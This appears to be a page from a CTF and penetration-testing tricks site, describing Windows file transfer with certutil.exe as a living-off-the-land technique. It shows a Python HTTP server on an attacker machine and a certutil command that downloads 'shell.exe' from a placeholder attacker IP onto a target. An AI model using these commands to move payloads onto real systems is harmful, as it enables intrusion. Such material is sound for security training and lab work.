> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-10/file-transfer/python-http-server/networking-file-transfer-windows.md).

# Windows

## Windows File Transfer via Certutil

Leverage the built-in Windows `certutil.exe` utility to download files from a hosted HTTP server. This is a common Living-Off-The-Land Binary (LOLBIN) technique for transferring payloads onto a target system. `certutil.exe` is a Windows command-line utility typically found in `C:\Windows\System32\` or `C:\Windows\SysWOW64\`.

On your attacker machine, host the file you want to transfer using a simple HTTP server:

```bash
python3 -m http.server 80
```

On the target Windows machine, from a command shell (like `cmd.exe` or PowerShell), use `certutil` to fetch the file from your HTTP server:

```powershell
certutil.exe -urlcache -split -f http://<your_attacker_ip>/shell.exe shell.exe
```

* `-urlcache`: This is the subcommand used for displaying or deleting URL cache entries, but it also handles the download implicitly.
* `-split`: This flag is sometimes necessary, especially for binary files, to ensure the file is downloaded correctly without extra characters or incorrect formatting.
* `-f`: Forces the overwrite of the destination file if it already exists.

Replace `<your_attacker_ip>` with the IP address of your machine hosting the HTTP server and `shell.exe` with the name of the file you are transferring. The file will be saved in the current directory where the `certutil` command is executed.
